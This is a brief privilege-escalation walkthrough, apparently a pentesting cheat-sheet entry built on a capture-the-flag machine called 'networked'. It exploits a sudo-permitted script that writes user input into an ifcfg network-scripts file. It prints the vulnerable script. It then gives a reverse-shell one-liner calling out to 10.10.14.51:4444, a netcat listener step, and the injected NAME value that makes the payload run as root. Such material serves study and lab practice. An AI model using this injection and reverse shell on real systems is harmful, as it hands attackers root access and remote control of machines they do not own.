Network Scripts Command Injection
Overview #
Attacker can do privesc if user has sudo permissions to create or modify ifcfg-<DEVICE_NAME>
under /etc/sysconfig/network-scripts
Environment Setup and Requirements #
- Sudo permissions
User guly may run the following commands on networked:
(root) NOPASSWD: /usr/local/sbin/changename.sh
- Script content
#!/bin/bash -p
cat > /etc/sysconfig/network-scripts/ifcfg-guly << EoF
DEVICE=guly0
ONBOOT=no
NM_CONTROLLED=no
EoF
regexp="^[a-zA-Z0-9_\ /-]+$"
for var in NAME PROXY_METHOD BROWSER_ONLY BOOTPROTO; do
echo "interface $var:"
read x
while [[ ! $x =~ $regexp ]]; do
echo "wrong input, try again"
echo "interface $var:"
read x
done
echo $var=$x >> /etc/sysconfig/network-scripts/ifcfg-guly
done
/sbin/ifup guly0
Steps #
- Create your malicuous script
echo 'bash -i >& /dev/tcp/10.10.14.51/4444 0>&1' > /home/guly/evil
- Open netcat listener on attacker machine
- Run script using sudo and enjoy
[guly@networked ~]$ sudo /usr/local/sbin/changename.sh
interface NAME:
guly0 /home/guly/evil
[...redacted...]